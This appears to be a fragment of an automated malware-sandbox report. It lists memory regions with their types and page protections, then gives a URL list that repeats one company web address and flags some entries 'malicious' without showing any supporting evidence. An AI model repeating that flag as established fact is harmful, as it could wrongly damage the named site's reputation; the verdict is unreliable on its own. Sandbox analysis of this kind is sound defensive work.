15D872C5000
heap
page read and write
7FFF7B4D0000
trusted library allocation
page read and write
7FFF7B410000
trusted library allocation
page read and write
1DC57C47000
heap
page execute and read and write
1DC68291000
trusted library allocation
page read and write
7FFF7B8B3000
trusted library allocation
page read and write
7FFF7B440000
trusted library allocation
page read and write
7FFF7B250000
trusted library allocation
page read and write
7FFF7B110000
trusted library allocation
page read and write
1DC70698000
heap
page read and write
7FFF7AF16000
trusted library allocation
page read and write
1DC56199000
heap
page read and write
2C82FFE000
stack
page read and write
15D87228000
heap
page read and write
7FFF7B1B0000
trusted library allocation
page read and write
7FFF7B390000
trusted library allocation
page read and write
1DC708A0000
heap
page read and write
7FFF7B12A000
trusted library allocation
page read and write
7FFF7B8E0000
trusted library allocation
page read and write
7FFF7B210000
trusted library allocation
page read and write
7FFF7AF00000
trusted library allocation
page read and write
7FFF7AF80000
trusted library allocation
page read and write
15D993D1000
trusted library allocation
page read and write
1DC58912000
trusted library allocation
page read and write
7FFF7B0E2000
trusted library allocation
page read and write
1DC710C0000
trusted library allocation
page read and write
7FFF7B980000
trusted library allocation
page read and write
7FFF7ACE7000
trusted library allocation
page read and write
1DC58780000
trusted library allocation
page read and write
608C87A000
stack
page read and write
608CA76000
stack
page read and write
608CBF6000
stack
page read and write
7FFF7B9D0000
trusted library allocation
page execute and read and write
7FFF7B180000
trusted library allocation
page read and write
7FFF7B870000
trusted library allocation
page read and write
7FFF7B0C0000
trusted library allocation
page read and write
7FFF7B360000
trusted library allocation
page read and write
15D993D9000
trusted library allocation
page read and write
7FFF7AFF0000
trusted library allocation
page read and write
15D8925D000
heap
page read and write
608C77F000
stack
page read and write
608C6FE000
stack
page read and write
15D893D1000
trusted library allocation
page read and write
1DC68289000
trusted library allocation
page read and write
7FFF7B4B0000
trusted library allocation
page read and write
7FFF7AF5E000
trusted library allocation
page read and write
7FFF7ACEC000
trusted library allocation
page read and write
7FFF7B54E000
trusted library allocation
page read and write
7FFF7B850000
trusted library allocation
page read and write
7FFF7B360000
trusted library allocation
page read and write
7FFF7ACD3000
trusted library allocation
page execute and read and write
1DC5829D000
trusted library allocation
page read and write
15DA16F5000
heap
page read and write
1DC561EC000
heap
page read and write
15D891F0000
heap
page read and write
7FFF7B600000
trusted library allocation
page read and write
15D99439000
trusted library allocation
page read and write
608C67E000
stack
page read and write
15D88C40000
trusted library allocation
page read and write
2C82CFE000
stack
page read and write
7FFF7B270000
trusted library allocation
page read and write
7FFF7B010000
trusted library allocation
page read and write
1DC7068A000
heap
page read and write
15D89930000
trusted library allocation
page read and write
1DC56282000
heap
page read and write
7DF4B09B0000
trusted library allocation
page execute and read and write
1DC561CE000
heap
page read and write
7FFF7AFB0000
trusted library allocation
page read and write
7FFF7AF10000
trusted library allocation
page read and write
7FFF7B1D0000
trusted library allocation
page read and write
15D871F0000
heap
page read and write
7FFF7B4C0000
trusted library allocation
page execute and read and write
7FFF7AFC0000
trusted library allocation
page read and write
2C83E4E000
stack
page read and write
7FFF7B350000
trusted library allocation
page read and write
7FFF7B160000
trusted library allocation
page read and write
7FFF7B6F0000
trusted library allocation
page read and write
15DA16C7000
heap
page read and write
1DC71110000
trusted library allocation
page read and write
1DC58394000
trusted library allocation
page read and write
7FFF7B4A0000
trusted library allocation
page read and write
7FFF7B2A0000
trusted library allocation
page read and write
7FFF7B150000
trusted library allocation
page read and write
7FFF7AF90000
trusted library allocation
page read and write
2C82E7E000
stack
page read and write
7FFF7B100000
trusted library allocation
page read and write
7FFF7B0B0000
trusted library allocation
page read and write
15D8B0FE000
trusted library allocation
page read and write
15D88D35000
heap
page read and write
15D88CD0000
trusted library allocation
page read and write
7FFF7B540000
trusted library allocation
page read and write
7FFF7B9C0000
trusted library allocation
page read and write
15D8730A000
heap
page read and write
7FFF7B320000
trusted library allocation
page read and write
7FFF7B193000
trusted library allocation
page read and write
7FFF7B2B0000
trusted library allocation
page read and write
2C832FE000
stack
page read and write
7FFF7B220000
trusted library allocation
page execute and read and write
7FFF7B180000
trusted library allocation
page read and write
2C833FF000
stack
page read and write
7FFF7B0B0000
trusted library allocation
page read and write
1DC682E8000
trusted library allocation
page read and write
15D8A330000
trusted library allocation
page read and write
7FFF7B5E0000
trusted library allocation
page read and write
7FFF7B950000
trusted library allocation
page read and write
7FFF7B620000
trusted library allocation
page read and write
7FFF7AFD0000
trusted library allocation
page read and write
15D99588000
trusted library allocation
page read and write
1DC71090000
trusted library allocation
page read and write
7FFF7B9B0000
trusted library allocation
page read and write
1DC58723000
trusted library allocation
page read and write
7FFF7B300000
trusted library allocation
page read and write
7FFF7B5C0000
trusted library allocation
page read and write
608CE78000
stack
page read and write
15D8730D000
heap
page read and write
7FFF7B430000
trusted library allocation
page read and write
7FFF7B340000
trusted library allocation
page read and write
7FFF7B390000
trusted library allocation
page read and write
7FFF7B960000
trusted library allocation
page read and write
15D89260000
heap
page read and write
2C82D7E000
stack
page read and write
7FFF7B840000
trusted library allocation
page read and write
1DC56380000
heap
page read and write
7FFF7AF04000
trusted library allocation
page read and write
608C7FE000
stack
page read and write
608CB78000
stack
page read and write
7FFF7AF0D000
trusted library allocation
page execute and read and write
7FFF7B740000
trusted library allocation
page read and write
7FFF7B904000
trusted library allocation
page read and write
7FFF7B143000
trusted library allocation
page read and write
1DC582A2000
trusted library allocation
page read and write
7FFF7AF17000
trusted library allocation
page read and write
7FFF7B3C0000
trusted library allocation
page read and write
7FFF7B3BC000
trusted library allocation
page read and write
1DC702D9000
heap
page read and write
15D872C1000
heap
page read and write
7FFF7B020000
trusted library allocation
page read and write
1DC58832000
trusted library allocation
page read and write
7FFF7B340000
trusted library allocation
page read and write
7FFF7AD86000
trusted library allocation
page read and write
7FFF7B8A2000
trusted library allocation
page read and write
15D89454000
trusted library allocation
page read and write
7FFF7AEF0000
trusted library allocation
page read and write
7FFF7AF40000
trusted library allocation
page read and write
7FFF7B940000
trusted library allocation
page read and write
7FFF7B5E0000
trusted library allocation
page read and write
7FFF7B0F0000
trusted library allocation
page execute and read and write
7FFF7AEEB000
trusted library allocation
page read and write
15D8927D000
heap
page read and write
7FFF7B780000
trusted library allocation
page read and write
7FFF7B2E0000
trusted library allocation
page read and write
7FFF7B310000
trusted library allocation
page read and write
7DF4A5B10000
trusted library allocation
page execute and read and write
7FFF7B380000
trusted library allocation
page read and write
1DC702F3000
heap
page read and write
7FFF7B260000
trusted library allocation
page read and write
1DC58B12000
trusted library allocation
page read and write
7FFF7B160000
trusted library allocation
page read and write
1DC71070000
trusted library allocation
page read and write
2C82F7E000
stack
page read and write
7FFF7B560000
trusted library allocation
page execute and read and write
7FFF7B750000
trusted library allocation
page read and write
7FFF7B920000
trusted library allocation
page read and write
7FFF7B600000
trusted library allocation
page execute and read and write
7FFF7B2D0000
trusted library allocation
page read and write
7FFF7B030000
trusted library allocation
page execute and read and write
2C8307A000
stack
page read and write
7FFF7B400000
trusted library allocation
page execute and read and write
1DC57C23000
trusted library allocation
page read and write
1DC7068F000
heap
page read and write
1DC70310000
heap
page read and write
7FFF7B6E0000
trusted library allocation
page read and write
7FFF7B0D0000
trusted library allocation
page read and write
1DC68281000
trusted library allocation
page read and write
2C829CE000
stack
page read and write
1DC58702000
trusted library allocation
page read and write
7FFF7AF20000
trusted library allocation
page read and write
2C82DFD000
stack
page read and write
7FFF7B2C0000
trusted library allocation
page read and write
7FFF7B000000
trusted library allocation
page execute and read and write
608CD74000
stack
page read and write
7FFF7ACDD000
trusted library allocation
page execute and read and write
1DC57BF0000
trusted library allocation
page read and write
15D99447000
trusted library allocation
page read and write
7FFF7AE80000
trusted library allocation
page read and write
7FFF7B020000
trusted library allocation
page execute and read and write
15D87595000
heap
page read and write
7FFF7B6D0000
trusted library allocation
page read and write
7FFF7B2F0000
trusted library allocation
page read and write
15D8908C000
heap
page read and write
7FFF7AEFA000
trusted library allocation
page read and write
15D87220000
heap
page read and write
7FFF7B90D000
trusted library allocation
page read and write
7FFF7B200000
trusted library allocation
page execute and read and write
7FFF7B3F0000
trusted library allocation
page read and write
1DC705FA000
heap
page read and write
7FFF7B3A0000
trusted library allocation
page read and write
7FFF7B230000
trusted library allocation
page read and write
7FFF7B4C0000
trusted library allocation
page read and write
15DA15A2000
heap
page read and write
1DC561CC000
heap
page read and write
7FFF7B5A0000
trusted library allocation
page read and write
7FFF7B120000
trusted library allocation
page read and write
7FFF7ADF0000
trusted library allocation
page execute and read and write
7FFF7B250000
trusted library allocation
page read and write
15D87590000
heap
page read and write
7FFF7ACF0000
trusted library allocation
page read and write
1DC702A3000
heap
page read and write
2C831F6000
stack
page read and write
7FFF7B170000
trusted library allocation
page read and write
15DA16D1000
heap
page read and write
7FFF7B490000
trusted library allocation
page read and write
15D87180000
heap
page read and write
7FFF7B4F0000
trusted library allocation
page read and write
7FFF7ADB6000
trusted library allocation
page execute and read and write
1DC682E5000
trusted library allocation
page read and write
15D88C90000
trusted library allocation
page read and write
7FFF7B240000
trusted library allocation
page read and write
1DC57D75000
heap
page read and write
7FFF7B890000
trusted library allocation
page read and write
1DC704C0000
heap
page read and write
15D88D30000
heap
page read and write
7FFF7AF30000
trusted library allocation
page read and write
7FFF7B590000
trusted library allocation
page read and write
15D88C10000
trusted library allocation
page read and write
15DA1470000
heap
page read and write
1DC58488000
trusted library allocation
page read and write
7FFF7B1E0000
trusted library allocation
page read and write
15D8ABB0000
trusted library allocation
page read and write
1DC57C40000
heap
page execute and read and write
7FFF7B280000
trusted library allocation
page read and write
1DC70315000
heap
page read and write
608CC7F000
stack
page read and write
7FFF7B370000
trusted library allocation
page read and write
7FFF7B930000
trusted library allocation
page read and write
15D871B0000
heap
page read and write
7FFF7B150000
trusted library allocation
page read and write
7FFF7AF50000
trusted library allocation
page read and write
15D8A880000
trusted library allocation
page read and write
7FFF7AFE0000
trusted library allocation
page read and write
7FFF7B312000
trusted library allocation
page read and write
7FFF7B500000
trusted library allocation
page read and write
7FFF7B9A0000
trusted library allocation
page read and write
2C82C7E000
stack
page read and write
1DC710D0000
trusted library allocation
page read and write
15DA1597000
heap
page execute and read and write
1DC71113000
trusted library allocation
page read and write
7FFF7AFB0000
trusted library allocation
page read and write
7FFF7AE70000
trusted library allocation
page read and write
7FFF7AD8C000
trusted library allocation
page execute and read and write
1DC57B90000
heap
page read and write
1DC710A0000
trusted library allocation
page read and write
15DA13D0000
heap
page execute and read and write
7FFF7AFA0000
trusted library allocation
page execute and read and write
7FFF7AF5A000
trusted library allocation
page read and write
7FFF7B550000
trusted library allocation
page read and write
608CDFE000
stack
page read and write
7FFF7B1A5000
trusted library allocation
page read and write
7FFF7B92A000
trusted library allocation
page read and write
15D892BA000
heap
page read and write
1DC563A0000
heap
page read and write
1DC583A6000
trusted library allocation
page read and write
7FFF7B902000
trusted library allocation
page read and write
1DC58391000
trusted library allocation
page read and write
7FFF7AF60000
trusted library allocation
page read and write
15D99436000
trusted library allocation
page read and write
7FFF7B280000
trusted library allocation
page execute and read and write
7FFF7B900000
trusted library allocation
page read and write
1DC710F0000
trusted library allocation
page read and write
7FFF7AF70000
trusted library allocation
page read and write
1DC583DD000
trusted library allocation
page read and write
7FFF7B3A0000
trusted library allocation
page read and write
7FFF7B260000
trusted library allocation
page read and write
1DC583D5000
trusted library allocation
page read and write
15DA15A0000
heap
page read and write
7FFF7B1A0000
trusted library allocation
page read and write
15D872CD000
heap
page read and write
1DC57C20000
trusted library allocation
page read and write
15D993E1000
trusted library allocation
page read and write
1DC5838B000
trusted library allocation
page read and write
2C83278000
stack
page read and write
7FFF7B860000
trusted library allocation
page read and write
7FFF7B137000
trusted library allocation
page read and write
1DC5838E000
trusted library allocation
page read and write
7FFF7B480000
trusted library allocation
page read and write
15D88C60000
trusted library allocation
page read and write
7FFF7B370000
trusted library allocation
page read and write
1DC71080000
trusted library allocation
page read and write
15D87190000
heap
page read and write
15D895FD000
trusted library allocation
page read and write
7FFF7B9C4000
trusted library allocation
page read and write
7FFF7B880000
trusted library allocation
page read and write
7FFF7AFE6000
trusted library allocation
page execute and read and write
7FFF7B3C0000
trusted library allocation
page read and write
7FFF7B0A0000
trusted library allocation
page read and write
7FFF7AF5C000
trusted library allocation
page execute and read and write
7FFF7B760000
trusted library allocation
page read and write
There are 444 hidden memdumps, click here to show them.

DOM / HTML

URL
Malicious
https://www.elevate.inc/our-story
malicious
https://www.elevate.inc/our-story
malicious
https://www.elevate.inc/our-story
malicious
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
https://www.elevate.inc/our-story
There are 7 hidden doms, click here to show them.